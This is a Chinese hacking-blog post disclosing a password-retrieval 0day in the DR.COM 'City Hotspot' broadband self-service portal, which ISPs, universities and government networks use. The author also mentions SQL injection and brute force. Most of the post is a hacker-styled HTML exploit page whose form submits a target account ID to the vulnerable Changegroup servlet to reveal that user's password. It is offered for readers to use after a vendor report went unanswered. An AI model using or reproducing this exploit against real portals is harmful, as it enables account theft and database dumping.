当前位置: iick's blog > 网站漏洞 > DR.COM城市热点GetPassword-0day漏洞&exp

DR.COM城市热点GetPassword-0day漏洞&exp

作者:hack1990 时间:12-06-23 阅读数:803人阅读

DR.COM城市热点宽带,很多城市都用这个吧?市区,政府,企业,运营商,大学等等。。都用这套软件提供接入宽带服务

 
最近研究了下,发现个漏洞,在DR.COM USS用户自助服务登录的WEB服务器
 
可以直接查看到指定ID用户的密码,也就是查询密码漏洞,同时,也是可以直接注入的
 
已提交官方,无果,愿早修复防止不法盗号脱裤。
 
当然如果登录页面没有验证码的话,也是可以穷举的,这就不说了
 
自己下源码看吧,
 
上图是做的简陋利用页。
 
 
 
源码:
 
 
 
<html><head><title>DR.COM!&hackdn-GetPassword Blackdos!   </title>
 
</script>
 
<span id="theText" style="width:100%">
 
<h1><center><font color=#FFF8DC>DR.COM!&hackdn-GetPassword Blackdos!</font></center></h1></span>
 
 
 
 
 
<br>
 
<body background="http://www.senai.br//upload/publicacoes/edu.jpg" bgcolor="#000000" text="#666666"  onkeydown="onKeyDown()" oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
 
<script language="JavaScript">
 
var bgOS = 0;
 
var bgOB = eval('document.body');
 
function SlBg(Saidai) {
 
bgOS = bgOS + 1;
 
if (bgOS > Saidai) bgOS = 0;
 
bgOB.style.backgroundPosition = "0 " + bgOS;}
 
var ST = window.setInterval("SlBg(100)",33);
 
</script>
 
</body></html>
 
<center><font face="Wingdings" color="white" style="font-size: 230pt">N</font><span class="style1"><span style="font-weight: 400"><font face="Impact" color="white" style="font-size: 100pt"></font></center>
 
<FORM NAME="form1" method="post" ACTION="http://用户自助服务网址/servlet/selfservice.Changegroup?fid=1002" >
 
<table width="100%" border="0" cellspacing="0" cellpadding="0">
 
  <tr height="20">
 
    <td align="center" bgcolor="" height="0">
 
 
 
    </td>
 
  </tr>
 
  <tr style="display:none">
 
    <td>
 
 
 
      <!-- 隐藏字段 -->
 
    </td>
 
  </tr>
 
  <tr>
 
 
 
    </td>
 
  </tr>
 
    <td>
 
     <table bgcolor="" width="59%" height="150" border="0" align="center" cellpadding="0" cellspacing="0">
 
      <tr>
 
         <td width="20%" align="center"> </td>
 
         <td width="80%">
 
            
 
         </td>
 
       </tr>
 
       <tr>
 
         <td width="20%" align="center">    ID: </td>
 
         <td width="80%">
 
           <input type="text" name="Account" maxlength="26" size="26">
 
         </td>
 
       </tr>
 
        <tr>
 
         <td width="20%" align="center">CHANG type: </td>

<td width="80%">

 
           <select name="CertType" size="1"  style="WIDTH: 196px;background-color:#ffffff; color:#0000ff; border: 1 double #B4B4B4" onMouseOver = "this.style.backgroundColor = '#E5F0FF'" onMouseOut = "this.style.backgroundColor = ''">
 
           <option value='0'>输入ID跟验证码</option>
 
           <select>
 
            
 
         </td>
 
       </tr>
 
       
 
       <tr>
 
          <td width="20%" align="center">验证码: </td>
 
         <td width="80%">
 
           <input type="text" name="chkCode" maxlength="4" size="16">
 
           <img src="http://用户自助服务网址/servlet/selfservice.checkcode">
 
         </td>
 
       </tr>
 
       <tr>
 
         <td width="20%" align="center">
 
             
 
         </td>
 
         <td width="80%" align="left">
 
            
 
         </td>
 
       </tr>
 
     </table>
 
   </td>
 
 </tr>
 
 <tr>
 
 
 
   </td>
 
 </tr>
 
 <tr>
 
   <td align="center" bgcolor="" height="">
 
      <INPUT TYPE="SUBMIT" NAME="Summit" VALUE="F U C K" class=s2 onclick="return domustinput(form1);">            
 
    
 
   </td>
 
 </tr>
 
</table>
 
</FORM>
 
<center><font size=5 color=white></font></center>
# Nmap Security Scanner 7.0

上一篇:校无忧投票系统利用0day

下一篇:WordPress Sitemile Auctions插件任意文件上传漏洞

相关文章

发表评论